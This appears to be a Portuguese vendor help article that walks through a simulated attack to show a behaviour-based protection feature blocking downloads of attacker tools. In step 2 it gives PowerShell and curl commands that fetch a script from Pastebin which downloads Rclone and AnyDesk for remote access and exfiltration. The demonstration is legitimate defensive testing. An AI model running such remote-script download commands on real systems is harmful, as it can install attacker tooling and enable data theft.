Demonstrando como a Prevenção Dinâmica Protege sua Rede

Visão geral

A Prevenção Dinâmica é um motor de segurança baseado em comportamento que aplica controles dinâmicos proativamente em resposta a ameaças detectadas para reduzir a superfície de ataque e mitigar as ameaças cedo, antes que qualquer impacto ocorra. Para mais informações, consulte O que é Prevenção Dinâmica?

Este artigo simula um cenário de ataque real para demonstrar como a Prevenção Dinâmica protege sua rede. Neste exemplo, um usuário baixa um script do Pastebin que um atacante usa para tentar recuperar ferramentas adicionais de alto risco necessárias para realizar um ataque futuro. A Prevenção Dinâmica identifica o comportamento malicioso e bloqueia a ferramenta de ser baixada, impedindo o ataque antes que possa progredir ou qualquer impacto ocorra.

A resposta a este ataque é totalmente automatizada. Nenhuma regra adicional é obrigatória. Simplesmente ativar a Prevenção Dinâmica é suficiente para impedir o ataque.

Para simular este ataque:

  1. Baixar uma ferramenta de alto risco sem ser bloqueado
  2. Baixar o script do Pastebin
  3. Tentar baixar as ferramentas de alto risco novamente. Desta vez, o download é bloqueado.

Pré-requisitos

  • A Prevenção Dinâmica está ativada com ações definidas para Bloquear

Etapa 1: Download de uma Ferramenta de Alto-Risco

Para demonstrar que a Prevenção Dinâmica bloqueia ações apenas quando fazem parte de uma sequência maliciosa, primeiro baixe o Rclone, uma ferramenta de linha de comando open-source para gerenciar arquivos. Os atacantes costumam usar o Rclone como uma ferramenta pós-comprometimento porque é legítimo, poderoso, e se mistura com a atividade administrativa normal.

Ação

Baixar Rclone de qualquer um dos seguintes:

  • O seguinte URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Em dispositivos Windows:

    • O seguinte comando PowerShell: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • Em dispositivos macOS/Linux:

    • O seguinte comando Terminal: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

Resultado

O arquivo é baixado com sucesso.

Explanation

Isso confirma que, em isolamento, a ação não é bloqueada, pois não é considerada maliciosa quando não é precedida por atividade suspeita.

Etapa 2: Download de um Script de Pastebin

Para simular o início de um ataque, baixe um script do Pastebin que, ao ser executado, baixa ferramentas comuns de atacantes, por exemplo, Rclone e AnyDesk para acesso remoto e exfiltração.

Ação

Baixar e executar o script do Pastebin:

  • Em dispositivos Windows:

    • O seguinte comando PowerShell: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
  • Em dispositivos macOS/Linux:

    • O seguinte comando Terminal: curl -sSL "https://pastebin.com/raw/tXhVK2V7"

Resultado

O script é executado e baixa as ferramentas. Um controle dinâmico é aplicado ao host, que é mostrado no Painel de Ameaças de Segurança no widget Host com Controles. Para mais informações, consulte Usando o Painel de Ameaças de Segurança.

Dynamic_Prevention1.png

Explanation

A Prevenção Dinâmica detecta indicadores de comportamento suspeito e aplica controles proativamente para bloquear ações maliciosas subsequentes, interrompendo o ataque antes que qualquer impacto ocorra.

Etapa 3: Download de uma Ferramenta de Alto-Risco

No ataque simulado, o atacante tenta baixar o Rclone. No entanto, porque esta ação segue a atividade suspeita de baixar o script do Pastebin e um controle é aplicado, a Prevenção Dinâmica bloqueia o download do Rclone.

Ação

Baixar Rclone de qualquer um dos seguintes:

  • O seguinte URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Em dispositivos Windows:

    • O seguinte comando PowerShell: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • Em dispositivos macOS/Linux:

    • O seguinte comando Terminal: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

Resultado

O download deste arquivo é bloqueado pelo controle. A ameaça mitigada é mostrada no Painel de Ameaças de Segurança no widget Host com Ameaças Mitigadas.

DP5.png

Explanation

Ao contrário do Passo 1, onde este script foi executado isoladamente e, portanto, permitido, o download deste script agora foi precedido por uma ação suspeita e é bloqueado pela Prevenção Dinâmica.

Demonstration

Este vídeo mostra uma demonstração deste ataque simulado:

Esse artigo foi útil?

Usuários que acharam isso útil: 0 de 0

0 comentário